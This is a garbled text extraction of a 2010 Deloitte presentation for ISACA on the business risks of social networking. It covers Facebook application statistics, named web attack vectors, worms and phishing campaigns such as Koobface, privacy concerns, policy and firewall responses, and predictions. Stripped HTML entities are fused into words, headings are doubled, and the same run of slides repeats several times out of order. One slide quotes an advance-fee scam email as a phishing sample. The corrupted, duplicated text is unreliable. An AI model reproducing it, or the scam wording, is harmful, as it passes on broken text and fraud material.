world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
